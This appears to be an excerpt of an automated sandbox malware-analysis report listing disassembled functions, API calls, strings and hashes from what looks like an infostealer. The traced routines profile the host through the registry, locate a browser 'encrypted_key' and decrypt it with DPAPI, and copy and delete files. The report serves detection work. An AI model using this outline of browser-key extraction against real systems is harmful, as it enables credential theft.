Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 6C75C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C75C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C75C969
GetSystemInfo.KERNEL32(?), ref: 6C75C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C75C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C75C9E2

Memory Dump Source

Source File: 00000003.00000002.2263296643.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true

Associated: 00000003.00000002.2262768716.000000006C740000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2268331425.000000006C7BD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2269513428.000000006C7CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2270373521.000000006C7D2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c740000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
Instruction ID: e237b3d2f3733e8c452f0589627fe10f3baa59e5c5315bcac129fe2396057b35
Opcode Fuzzy Hash: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
Instruction Fuzzy Hash: AE2129717412096FDB14AB24CD89BAE77B9EB4A701F90013AF903A7B80DF306E0087A1

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1843082770
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

^userContextId=4294967295, xrefs: 0040D4D7
moz-extension+++, xrefs: 0040D4DD

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

, xrefs: 00408241
DPAPI, xrefs: 0040821B
"encrypted_key":", xrefs: 004081DF

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
